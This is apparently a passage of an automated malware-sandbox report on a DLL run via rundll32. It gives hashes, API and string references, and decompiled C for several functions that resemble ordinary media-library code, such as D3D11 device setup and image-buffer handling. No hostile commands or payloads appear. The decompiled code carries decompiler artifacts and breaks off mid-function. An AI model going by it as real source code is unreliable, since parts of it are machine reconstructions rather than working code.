Opcode Fuzzy Hash: 98ded283bb3ae70f21cce0f44d25f16bdae0512caeeaba98897a65d1631d7c3f
Instruction Fuzzy Hash: 8BB1A675A087068BD714EF28C48066EB7E1FF882D0F55892EE989C7345EB31ED44CB92

Uniqueness

Uniqueness Score: -1.00%

Function 10035030 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 238COMMON

Download Yara Rule

APIs

BCryptOpenAlgorithmProvider.BCRYPT ref: 10035059
BCryptGenRandom.BCRYPT ref: 10035083
BCryptCloseAlgorithmProvider.BCRYPT ref: 1003509A
mvpriv_open.F072 ref: 100350B7
_read.MSVCRT ref: 100350D7
_close.MSVCRT ref: 100350E1
mvpriv_open.F072 ref: 100350FC
_read.MSVCRT ref: 1003511C
_close.MSVCRT ref: 10035126
clock.MSVCRT ref: 10035208

Strings

RNG, xrefs: 1003503A
N, xrefs: 10035375
Microsoft Primitive Provider, xrefs: 10035034

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Crypt$AlgorithmProvider_close_readmvpriv_open$CloseOpenRandomclock
String ID: Microsoft Primitive Provider$N$RNG
API String ID: 4139849330-2077157618
Opcode ID: ba0f5cf16dd16bf2a74f44db4dfaca41cdcaddc0f25a1e0faec0a639bd5545d4
Instruction ID: 55d25eed0a1b74d277015fe739bb6a08acfe9f0c77a35e4a57d9ad1f3d4738c5
Opcode Fuzzy Hash: ba0f5cf16dd16bf2a74f44db4dfaca41cdcaddc0f25a1e0faec0a639bd5545d4
Instruction Fuzzy Hash: E891A075A043508FE304DF78C9C021ABBE2FBC9311F51897EE9889B365EB75D9448B51

Uniqueness

Uniqueness Score: -1.00%

Function 1001F523 Relevance: 30.0, APIs: 10, Strings: 7, Instructions: 273
libraryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 30%

			E1001F523(intOrPtr _a4, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v64;
				intOrPtr _v96;
				signed int _v100;
				char _v320;
				char _v328;
				intOrPtr _v336;
				intOrPtr _v344;
				intOrPtr _v352;
				void* _v356;
				signed int _v360;
				char _v364;
				intOrPtr* _v368;
				intOrPtr _v376;
				intOrPtr _v384;
				signed int _v388;
				char _v392;
				void* _v396;
				intOrPtr _v400;
				intOrPtr* _v404;
				intOrPtr* _v408;
				void* _v412;
				CHAR* _v416;
				signed int _v420;
				char _v424;
				int _v428;
				void* _v452;
				char* _v456;
				intOrPtr _v460;
				char _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				char _v476;
				intOrPtr _v480;
				void* _t93;
				struct HINSTANCE__* _t94;
				intOrPtr _t102;
				void* _t108;
				intOrPtr* _t109;
				char _t110;
				void* _t111;
				intOrPtr* _t112;
				intOrPtr* _t115;
				void* _t116;
				struct HINSTANCE__* _t117;
				_Unknown_base(*)()* _t118;
				void* _t119;
				intOrPtr* _t120;
				intOrPtr* _t122;
				intOrPtr* _t124;
				void* _t127;
				void* _t134;
				int _t136;
				void* _t140;
				intOrPtr* _t142;
				intOrPtr* _t144;
				_Unknown_base(*)()* _t146;
				intOrPtr _t147;
				signed int _t152;
				char _t155;
				intOrPtr _t162;
				intOrPtr _t163;
				intOrPtr _t164;
				intOrPtr _t165;
				intOrPtr* _t169;
				intOrPtr* _t191;
				intOrPtr _t194;
				void* _t195;
				void* _t198;
				void* _t200;
				void* _t201;
				intOrPtr* _t202;
				intOrPtr* _t204;
				intOrPtr* _t205;

				_v328 = 0;
				_t191 =  *((intOrPtr*)(_a4 + 0xc));
				_t93 = E100110D0(_a12, "debug", 0, 0);
				_t94 = LoadLibraryA("d3d11_1sdklayers.dll");
				_t200 = _t198 - 0x178;
				if(_t93 == 0 || _t94 == 0) {
					_t194 = 0x800;
					_v344 = 0;
				} else {
					_t194 = 0x802;
					_v344 = 1;
				}
				_v396 = 0x100d7268;
				_v320 = 0;
				_t152 =  &_v320;
				_v384 = 0;
				_v388 = _t152;
				_v392 = 0;
				__imp__InitOnceBeginInitialize();
				_t201 = _t200 - 0x10;
				if(_v336 != 0) {
					_v356 = L100A7C1C("d3d11.dll", 0, 0);
					_t102 = L100A7C1C("dxgi.dll", 0, 0);
					_t155 = _v356;
					if(_t155 != 0) {
						_v352 = _t102;
						if(_t102 != 0) {
							_v412 = _t155;
							_v408 = "D3D11CreateDevice";
							_v356 = GetProcAddress;
							_t146 = GetProcAddress(??, ??);
							_v416 = "CreateDXGIFactory1";
							_t169 = _v364;
							 *0x100d7260 = _t146;
							_v420 = _v360;
							_t147 =  *_t169(0, 0);
							_push(_t169);
							_push(_t169);
							 *0x100d7264 = _t147;
						}
					}
				}
				_v412 = 0x100d7268;
				_v404 = 0;
				_v408 = 0;
				__imp__InitOnceComplete();
				_t202 = _t201 - 0xc;
				if( *0x100d7260 == 0) {
					L29:
					E10026560(_v24, 0x10, "Failed to load D3D11 library or its functions\n");
					goto L30;
				} else {
					_t109 =  *0x100d7264;
					if(_t109 == 0) {
						goto L29;
					}
					if(_v20 != 0) {
						_v420 = _t152;
						_v424 = 0x100c75a0;
						_t134 =  *_t109();
						_t202 = _t202 - 8;
						if(_t134 >= 0) {
							 *_t202 = _v28;
							_t136 = atoi(??);
							_v424 =  &_v364;
							_v428 = _t136;
							 *_t202 = _v356;
							_t140 =  *((intOrPtr*)( *_v356 + 0x1c))();
							_t205 = _t202 - 0xc;
							if(_t140 < 0) {
								_v376 = 0;
								_t142 = _v368;
								 *_t205 = _t142;
								 *((intOrPtr*)( *_t142 + 8))();
								_t202 = _t205 - 4;
							} else {
								_t144 = _v368;
								 *_t205 = _t144;
								 *((intOrPtr*)( *_t144 + 8))();
								_t202 = _t205 - 4;
							}
						}
					}
					_t110 = _v356;
					if(_t110 != 0) {
						_v420 = _t152;
						_v424 = _t110;
						_t127 =  *((intOrPtr*)( *_t110 + 0x20))();
						_t202 = _t202 - 8;
						if(_t127 >= 0) {
							_v412 = _t152;
							_v416 = _v96;
							_v420 = _v100;
							_v424 = "Using device %04x:%04x (%ls).\n";
							_v428 = 0x20;
							 *_t202 = _v32;
							E10026560();
						}
						_t110 = _v364;
					}
					_v412 = _t194;
					_v388 = 0;
					_v392 = 0;
					_v400 = 7;
					_v404 = 0;
					_v408 = 0;
					_v396 = _t191;
					_v416 = 0;
					_v420 = 0 | _t110 == 0x00000000;
					_v424 = _t110;
					_t111 =  *0x100d7260();
					_t202 = _t202 - 0x28;
					_t195 = _t111;
					_t112 = _v396;
					if(_t112 != 0) {
						_v464 = _t112;
						 *((intOrPtr*)( *_t112 + 8))();
						_t202 = _t202 - 4;
					}
					if(_t195 < 0) {
						E10026560(_v64, 0x10, "Failed to create Direct3D device (%lx)\n", _t195);
						L30:
						_t108 = 0xb1b4b1ab;
						goto L19;
					} else {
						_t115 =  *_t191;
						_v456 =  &_v392;
						_v460 = 0x100c70d0;
						_v464 = _t115;
						_t116 =  *((intOrPtr*)( *_t115))();
						_t202 = _t202 - 0xc;
						if(_t116 >= 0) {
							_t122 = _v404;
							_v472 = 1;
							_v476 = _t122;
							 *((intOrPtr*)( *_t122 + 0x14))();
							_t204 = _t202 - 8;
							_t124 = _v412;
							 *_t204 = _t124;
							 *((intOrPtr*)( *_t124 + 8))();
							_t202 = _t204 - 4;
						}
						if(_v424 != 0) {
							_t117 = LoadLibraryA("dxgidebug.dll");
							_t202 = _t202 - 4;
							if(_t117 != 0) {
								_t118 = GetProcAddress(_t117, "DXGIGetDebugInterface");
								_t202 = _t202 - 8;
								if(_t118 != 0) {
									_v472 = _t152;
									_v400 = 0;
									_v476 = 0x100c7530;
									_t119 =  *_t118();
									_t202 = _t202 - 8;
									if(_t119 >= 0) {
										_t120 = _v408;
										if(_t120 != 0) {
											_v464 = 7;
											_t162 =  *0x100c6e30; // 0xe48ae283
											 *_t202 = _t120;
											_v480 = _t162;
											_t163 =  *0x100c6e34; // 0x490bda80
											_v476 = _t163;
											_t164 =  *0x100c6e38; // 0xe943e687
											_v472 = _t164;
											_t165 =  *0x100c6e3c; // 0x8dacfa9
											_v468 = _t165;
											 *((intOrPtr*)( *_t120 + 0xc))();
											_t202 = _t202 - 0x18;
										}
									}
								}
							}
						}
						_t108 = 0;
						L19:
						return _t108;
					}
				}
			}

0x1001f545
0x1001f550
0x1001f569
0x1001f57d
0x1001f57f
0x1001f584
0x1001f5a2
0x1001f5a7
0x1001f58a
0x1001f58f
0x1001f594
0x1001f594
0x1001f5ab
0x1001f5b6
0x1001f5ba
0x1001f5be
0x1001f5c4
0x1001f5c8
0x1001f5cc
0x1001f5d2
0x1001f5db
0x1001f8b6
0x1001f8bf
0x1001f8c4
0x1001f8ca
0x1001f8d0
0x1001f8d6
0x1001f8dc
0x1001f8e5
0x1001f8ed
0x1001f8f1
0x1001f8f9
0x1001f901
0x1001f905
0x1001f90a
0x1001f90d
0x1001f90f
0x1001f910
0x1001f911
0x1001f911
0x1001f8d6
0x1001f8ca
0x1001f5e1
0x1001f5ea
0x1001f5f0
0x1001f5f4
0x1001f5ff
0x1001f604
0x1001f85a
0x1001f876
0x00000000
0x1001f60a
0x1001f60a
0x1001f611
0x00000000
0x00000000
0x1001f620
0x1001f622
0x1001f626
0x1001f62d
0x1001f62f
0x1001f634
0x1001f7f7
0x1001f7fa
0x1001f80b
0x1001f813
0x1001f817
0x1001f81a
0x1001f81d
0x1001f822
0x1001f842
0x1001f846
0x1001f84c
0x1001f84f
0x1001f852
0x1001f824
0x1001f824
0x1001f82a
0x1001f82d
0x1001f830
0x1001f830
0x1001f822
0x1001f634
0x1001f63a
0x1001f640
0x1001f644
0x1001f648
0x1001f64b
0x1001f64e
0x1001f653
0x1001f7b0
0x1001f7bb
0x1001f7c6
0x1001f7cf
0x1001f7d8
0x1001f7e3
0x1001f7e6
0x1001f7e6
0x1001f659
0x1001f659
0x1001f65d
0x1001f665
0x1001f66e
0x1001f674
0x1001f67a
0x1001f680
0x1001f688
0x1001f68f
0x1001f693
0x1001f697
0x1001f69a
0x1001f6a0
0x1001f6a3
0x1001f6a5
0x1001f6ab
0x1001f6af
0x1001f6b2
0x1001f6b5
0x1001f6b5
0x1001f6ba
0x1001f8a5
0x1001f87b
0x1001f87b
0x00000000
0x1001f6c0
0x1001f6c0
0x1001f6cd
0x1001f6d1
0x1001f6d5
0x1001f6d8
0x1001f6da
0x1001f6df
0x1001f6e1
0x1001f6ec
0x1001f6f0
0x1001f6f3
0x1001f6f6
0x1001f6f9
0x1001f6ff
0x1001f702
0x1001f705
0x1001f705
0x1001f70e
0x1001f727
0x1001f729
0x1001f72e
0x1001f73c
0x1001f742
0x1001f747
0x1001f749
0x1001f74f
0x1001f753
0x1001f75a
0x1001f75c
0x1001f761
0x1001f763
0x1001f769
0x1001f772
0x1001f776
0x1001f77c
0x1001f77f
0x1001f783
0x1001f789
0x1001f78d
0x1001f793
0x1001f797
0x1001f79d
0x1001f7a1
0x1001f7a4
0x1001f7a4
0x1001f769
0x1001f761
0x1001f747
0x1001f72e
0x1001f710
0x1001f712
0x1001f71c
0x1001f71c
0x1001f6ba

APIs

mv_dict_get.F072 ref: 1001F569
LoadLibraryA.KERNEL32 ref: 1001F57D
InitOnceBeginInitialize.KERNEL32 ref: 1001F5CC
InitOnceComplete.KERNEL32 ref: 1001F5F4

Strings

DXGIGetDebugInterface, xrefs: 1001F733
dxgi.dll, xrefs: 1001F8BA
Failed to load D3D11 library or its functions, xrefs: 1001F861
Failed to create Direct3D device (%lx), xrefs: 1001F890
debug, xrefs: 1001F534
Using device %04x:%04x (%ls)., xrefs: 1001F7CA
d3d11.dll, xrefs: 1001F8AC

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: InitOnce$BeginCompleteInitializeLibraryLoadmv_dict_get
String ID: DXGIGetDebugInterface$Failed to create Direct3D device (%lx)$Failed to load D3D11 library or its functions$Using device %04x:%04x (%ls).$d3d11.dll$debug$dxgi.dll
API String ID: 2640887736-2754084114
Opcode ID: 46d71de76901be22f43a985af2c852e585d150c4c55c8bf33d4014df43fd258f
Instruction ID: b26665e88cdb3ff3bd93bc6ff27e16a968a577adae798b8ccfa67922602f4651
Opcode Fuzzy Hash: 46d71de76901be22f43a985af2c852e585d150c4c55c8bf33d4014df43fd258f
Instruction Fuzzy Hash: 4EB1E4B4A087419FD354EF69D58462ABBF1FF89740F41892EE989CB354EB34D884CB42

Uniqueness

Uniqueness Score: -1.00%

Function 100132D0 Relevance: 28.6, APIs: 19, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E100132D0() {
				void* _t43;
				intOrPtr _t61;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				signed int _t72;
				signed int _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr* _t78;
				intOrPtr* _t84;
				intOrPtr* _t87;
				intOrPtr* _t93;
				void* _t94;
				intOrPtr* _t95;

				_t95 = _t94 - 0x2c;
				_t87 =  *((intOrPtr*)(_t95 + 0x40));
				if(_t87 != 0) {
					if( *((intOrPtr*)(_t87 + 0xc)) == 0) {
						L4:
						_t84 =  *((intOrPtr*)(_t87 + 0x1c));
						if(_t84 == 0) {
							L21:
							 *_t95 =  *_t87;
							L23();
							 *_t95 =  *((intOrPtr*)(_t87 + 8));
							L23();
							 *_t95 =  *((intOrPtr*)(_t87 + 0x14));
							L23();
							 *((intOrPtr*)(_t95 + 0x40)) = _t87;
							return __imp___aligned_free();
						}
						if( *((intOrPtr*)(_t84 + 0xc)) == 0) {
							L8:
							_t93 =  *((intOrPtr*)(_t84 + 0x1c));
							if(_t93 == 0) {
								L20:
								 *_t95 =  *_t84;
								L23();
								 *_t95 =  *((intOrPtr*)(_t84 + 8));
								L23();
								 *_t95 =  *((intOrPtr*)(_t84 + 0x14));
								L23();
								 *_t95 = _t84;
								L23();
								goto L21;
							}
							if( *((intOrPtr*)(_t93 + 0xc)) == 0) {
								L12:
								_t78 =  *((intOrPtr*)(_t93 + 0x1c));
								if(_t78 == 0) {
									L19:
									 *_t95 =  *_t93;
									L23();
									 *_t95 =  *((intOrPtr*)(_t93 + 8));
									L23();
									 *_t95 =  *((intOrPtr*)(_t93 + 0x14));
									L23();
									 *_t95 = _t93;
									L23();
									goto L20;
								}
								if( *((intOrPtr*)(_t78 + 0xc)) == 0) {
									L16:
									_t55 =  *((intOrPtr*)(_t78 + 0x1c));
									if( *((intOrPtr*)(_t78 + 0x1c)) != 0) {
										 *((intOrPtr*)(_t95 + 0x1c)) = _t78;
										L10012850(_t55);
										_t78 =  *((intOrPtr*)(_t95 + 0x1c));
									}
									 *((intOrPtr*)(_t95 + 0x1c)) = _t78;
									 *_t95 =  *_t78;
									L23();
									 *_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t95 + 0x1c)) + 8));
									L23();
									 *_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t95 + 0x1c)) + 0x14));
									L23();
									 *_t95 =  *((intOrPtr*)(_t95 + 0x1c));
									L23();
									goto L19;
								}
								_t72 = 0;
								do {
									 *((intOrPtr*)(_t95 + 0x1c)) = _t78;
									_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t78 + 8)) + _t72 * 4));
									_t72 = _t72 + 1;
									 *_t95 = _t61;
									L23();
									_t78 =  *((intOrPtr*)(_t95 + 0x1c));
								} while (_t72 <  *((intOrPtr*)(_t78 + 0xc)));
								goto L16;
							}
							_t73 = 0;
							do {
								_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 8)) + _t73 * 4));
								_t73 = _t73 + 1;
								 *_t95 = _t63;
								L23();
							} while (_t73 <  *((intOrPtr*)(_t93 + 0xc)));
							goto L12;
						}
						_t74 = 0;
						do {
							_t65 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 8)) + _t74 * 4));
							_t74 = _t74 + 1;
							 *_t95 = _t65;
							L23();
						} while (_t74 <  *((intOrPtr*)(_t84 + 0xc)));
						goto L8;
					}
					_t75 = 0;
					do {
						_t67 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 8)) + _t75 * 4));
						_t75 = _t75 + 1;
						 *_t95 = _t67;
						L23();
					} while (_t75 <  *((intOrPtr*)(_t87 + 0xc)));
					goto L4;
				}
				return _t43;
			}

0x100132d4
0x100132d7
0x100132dd
0x100132e8
0x10013304
0x10013304
0x10013309
0x10013439
0x1001343b
0x1001343e
0x10013446
0x10013449
0x10013451
0x10013454
0x10013459
0x100290d0
0x100290d0
0x10013314
0x10013334
0x10013334
0x10013339
0x10013411
0x10013413
0x10013416
0x1001341e
0x10013421
0x10013429
0x1001342c
0x10013431
0x10013434
0x00000000
0x10013434
0x10013344
0x10013364
0x10013364
0x10013369
0x100133e8
0x100133eb
0x100133ee
0x100133f6
0x100133f9
0x10013401
0x10013404
0x10013409
0x1001340c
0x00000000
0x1001340c
0x10013370
0x1001339c
0x1001339c
0x100133a1
0x100133a3
0x100133a7
0x100133ac
0x100133ac
0x100133b0
0x100133b6
0x100133b9
0x100133c5
0x100133c8
0x100133d4
0x100133d7
0x100133e0
0x100133e3
0x00000000
0x100133e3
0x10013372
0x10013380
0x10013380
0x10013387
0x1001338a
0x1001338b
0x1001338e
0x10013393
0x10013397
0x00000000
0x10013380
0x10013346
0x10013350
0x10013353
0x10013356
0x10013357
0x1001335a
0x1001335f
0x00000000
0x10013350
0x10013316
0x10013320
0x10013323
0x10013326
0x10013327
0x1001332a
0x1001332f
0x00000000
0x10013320
0x100132ea
0x100132f0
0x100132f3
0x100132f6
0x100132f7
0x100132fa
0x100132ff
0x00000000
0x100132f0
0x10013477

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 196854d94c2d3dadbfed7b001a059d3303f2942ada5cc75a7543bfd3e5186445
Instruction ID: aab0cb6abdf460125275c6e5ebe0c2fb3ff18ba6de562b5529d80b352c1cac01
Opcode Fuzzy Hash: 196854d94c2d3dadbfed7b001a059d3303f2942ada5cc75a7543bfd3e5186445
Instruction Fuzzy Hash: 14519F79A047098FCB50EFA9D0C5A5AF7F0FF44250F41892DE8998B301DA71F985CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1002334C Relevance: 23.4, APIs: 11, Strings: 2, Instructions: 635
COMMONCrypto

Download Yara Rule

C-Code - Quality: 35%

			E1002334C(signed int __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				unsigned int _t304;
				char* _t305;
				signed int _t314;
				signed int _t316;
				signed int _t325;
				signed int _t330;
				signed int _t331;
				signed int _t332;
				int _t335;
				signed int _t336;
				signed int _t338;
				signed int _t342;
				signed int _t344;
				signed int _t347;
				signed int _t348;
				signed char* _t350;
				signed int _t351;
				int _t352;
				signed int _t354;
				int _t355;
				signed int _t356;
				signed int _t358;
				int _t361;
				signed int _t362;
				void _t364;
				signed int _t365;
				signed int _t367;
				signed int _t369;
				signed int _t372;
				intOrPtr _t379;
				intOrPtr _t380;
				intOrPtr _t381;
				intOrPtr _t382;
				intOrPtr _t383;
				intOrPtr _t384;
				signed int _t386;
				signed int _t388;
				char* _t389;
				signed int _t393;
				signed char _t398;
				void* _t399;
				char* _t405;
				char _t406;
				char* _t408;
				signed int _t409;
				signed char _t411;
				signed int _t413;
				signed int _t414;
				signed int _t417;
				signed int _t418;
				signed short _t425;
				void* _t429;
				char* _t430;
				unsigned int _t434;
				signed int _t435;
				signed int _t437;
				signed char _t439;
				signed char* _t440;
				unsigned int _t441;
				signed int _t442;
				int _t444;
				signed char _t449;
				void* _t450;
				signed int _t453;
				signed int _t454;
				intOrPtr _t455;
				signed char _t456;
				signed char _t457;
				int _t458;
				char* _t463;
				char* _t464;
				signed int _t465;
				signed int _t467;
				signed int _t471;
				signed int _t474;
				signed int _t475;
				signed int _t477;
				signed int _t479;
				signed int* _t484;
				signed int _t489;
				signed int _t494;
				void _t495;
				char* _t496;
				signed int _t498;
				void* _t499;
				signed int _t501;
				void* _t502;
				void* _t503;
				signed int _t507;
				intOrPtr _t508;
				intOrPtr _t509;
				void* _t514;
				signed int _t517;
				char* _t519;
				signed int _t526;
				signed int _t528;
				int _t533;
				signed int _t534;
				void* _t537;
				signed int* _t538;
				signed int _t539;
				char* _t540;
				void* _t541;
				unsigned int _t543;
				unsigned int _t544;
				signed int _t545;
				signed int _t547;
				signed int _t548;
				signed int _t549;
				signed int _t550;
				signed int _t552;
				int _t553;
				void* _t554;
				char** _t555;
				signed int* _t557;
				void* _t571;

				_t465 = __edx;
				_t555 = _t554 - 0x6c;
				_t408 = _t555[0x24];
				_t519 = _t555[0x22];
				_t555[3] = _t555[0x27];
				 *_t555 = _t408;
				_t555[2] = _t555[0x26];
				_t555[1] = _t555[0x25];
				_t304 = E10023180(__edx, __eflags);
				 *_t555 = _t408;
				_t543 = _t304;
				_t305 = E10034790();
				_t555[0x12] = _t305;
				_t430 = _t305;
				if((_t543 >> 0x0000001f | _t465 & 0xffffff00 | _t543 - _t555[0x21] > 0x00000000) != 0 || _t430 == 0) {
					_t544 = 0xffffffea;
					goto L28;
				} else {
					_t467 = _t430[4] & 0x000000ff;
					if(_t467 == 0) {
						_t496 = 0;
						_t555[0xf] = 0;
					} else {
						_t463 =  >=  ? _t430[0x10] : 0;
						_t555[0xf] = _t463;
						_t496 = _t463;
						if(_t467 != 1) {
							_t464 = _t555[0x12];
							_t496 =  >=  ? _t555[0xf] : _t464[0x24];
							_t555[0xf] = _t496;
							if(_t467 != 2) {
								_t405 =  >=  ? _t496 : _t464[0x38];
								_t555[0xf] = _t405;
								_t496 = _t405;
								if(_t467 != 3) {
									_t406 = _t464[0x4c];
									_t571 = _t496 - _t406;
									_t407 =  >=  ? _t496 : _t406;
									_t555[0xf] =  >=  ? _t496 : _t406;
								}
							}
						}
					}
					_t555[1] = _t408;
					_t555[2] = _t555[0x25];
					 *_t555 =  &(_t555[0x14]);
					if(E100215D0(_t571) < 0) {
						_t555[5] = 0x209;
						_t555[1] = 0;
						 *_t555 = 0;
						_t555[4] = "libavutil/imgutils.c";
						_t555[3] = "ret >= 0";
						_t555[2] = "Assertion %s failed at %s:%d\n";
						E10026560();
						abort();
						_push(_t543);
						_push(_t496);
						_t557 = _t555 - 0x15c;
						_t409 = _t557[0x5e];
						 *_t557 = _t409;
						_t314 = E10034790(_t408);
						 *_t557 = _t409;
						_t545 = _t314;
						_t557[0xd] = L10034870(_t519);
						_t316 = 0;
						__eflags = 0;
						do {
							 *((intOrPtr*)(_t557 + _t316 + 0xd0)) = 0;
							 *((intOrPtr*)(_t557 + _t316 + 0xd4)) = 0;
							_t316 = _t316 + 8;
							__eflags = _t316 - 0x80;
						} while (_t316 < 0x80);
						_t557[0x14] = 0;
						_t557[0x15] = 0;
						_t557[0x16] = 0;
						_t557[0x17] = 0;
						_t557[0x18] = 0;
						_t557[0x19] = 0;
						_t557[0x1a] = 0;
						_t557[0x1b] = 0;
						__eflags = _t557[0xd] - 1 - 3;
						if(_t557[0xd] - 1 > 3) {
							L60:
							return 0xffffffea;
						} else {
							__eflags = _t545;
							if(_t545 == 0) {
								goto L60;
							} else {
								_t325 =  *(_t545 + 8);
								_t471 = _t325 & 0x00000008;
								_t498 = _t471;
								__eflags = _t498;
								if(_t498 != 0) {
									goto L60;
								} else {
									_t557[0xa] = _t325 & 0x00000020;
									__eflags = _t325 & 0x00000004;
									if(__eflags != 0) {
										 *_t557 = _t409;
										_t557[2] = 0;
										_t557[1] = _t557[0x60];
										_t547 = E10021480(__eflags);
										_t330 = _t409 - 9;
										__eflags = _t330 - 1;
										_t331 = _t330 & 0xffffff00 | _t330 - 0x00000001 < 0x00000000;
										__eflags = _t409 - 9;
										_t411 =  !=  ? _t498 : 0xff;
										__eflags = _t557[0xd] - 1;
										if(__eflags != 0 || __eflags == 0) {
											goto L60;
										} else {
											__eflags = _t547;
											if(_t547 <= 0) {
												goto L60;
											} else {
												__eflags = _t557[0x5c];
												if(_t557[0x5c] != 0) {
													__eflags = _t557[0x61];
													_t526 =  *(_t557[0x5c]);
													if(_t557[0x61] > 0) {
														_t335 = (_t411 & 0x000000ff) * 0x1010101;
														__eflags = _t335;
														do {
															__eflags = _t547 - 8;
															_t474 = _t547;
															_t499 = _t526;
															if(_t547 >= 8) {
																__eflags = _t526 & 0x00000001;
																if((_t526 & 0x00000001) != 0) {
																	 *_t526 = _t335;
																	_t499 = _t526 + 1;
																	_t226 = _t547 - 1; // -1
																	_t474 = _t226;
																}
																__eflags = _t499 & 0x00000002;
																if((_t499 & 0x00000002) != 0) {
																	 *_t499 = _t335;
																	_t474 = _t474 - 2;
																	_t499 = _t499 + 2;
																}
																__eflags = _t499 & 0x00000004;
																if((_t499 & 0x00000004) != 0) {
																	 *_t499 = _t335;
																	_t474 = _t474 - 4;
																	_t499 = _t499 + 4;
																}
																_t434 = _t474;
																_t474 = _t474 & 0x00000003;
																_t435 = _t434 >> 2;
																_t335 = memset(_t499, _t335, _t435 << 2);
																_t557 =  &(_t557[3]);
																_t499 = _t499 + _t435;
															}
															_t475 = _t474 & 0x00000007;
															__eflags = _t475;
															if(_t475 != 0) {
																_t437 = 0;
																__eflags = 0;
																do {
																	 *(_t499 + _t437) = _t411;
																	_t437 = _t437 + 1;
																	__eflags = _t437 - _t475;
																} while (_t437 < _t475);
															}
															_t526 = _t526 +  *(_t557[0x5d]);
															_t216 =  &(_t557[0x61]);
															 *_t216 = _t557[0x61] - 1;
															__eflags =  *_t216;
														} while ( *_t216 != 0);
													}
												}
												goto L77;
											}
										}
									} else {
										_t477 =  *(_t545 + 4) & 0x000000ff;
										__eflags = _t477;
										if(__eflags == 0) {
											L57:
											_t557[0xa] = _t545;
											_t501 = _t557[0x60];
											_t548 = 0;
											_t528 = _t557[0xd];
											while(1) {
												_t557[2] = _t548;
												_t557[1] = _t501;
												 *_t557 = _t409;
												_t336 = E10021480(__eflags);
												 *(_t557 + 0x60 + _t548 * 4) = _t336;
												__eflags = _t336;
												if(_t336 < 0) {
													goto L60;
												}
												_t548 = _t548 + 1;
												__eflags = _t528 - _t548;
												if(__eflags <= 0) {
													_t549 = _t557[0xa];
													__eflags = _t557[0x5c];
													if(_t557[0x5c] == 0) {
														L77:
														_t332 = 0;
														__eflags = 0;
													} else {
														_t557[0x13] = _t549;
														__eflags = 0;
														_t557[0xe] =  &(_t557[0x34]);
														_t557[0xa] = 0;
														do {
															_t338 = _t557[0xa];
															_t557[0xf] =  *(_t557 + 0x60 + _t338 * 4);
															_t550 =  *(_t557[0x5c] + _t338 * 4);
															__eflags = _t338 - 1 - 1;
															if(_t338 - 1 <= 1) {
																_t439 =  *(_t557[0x13] + 6) & 0x000000ff;
																_t342 = 1 << _t439;
															} else {
																_t342 = 1;
																_t439 = 0;
																__eflags = 0;
															}
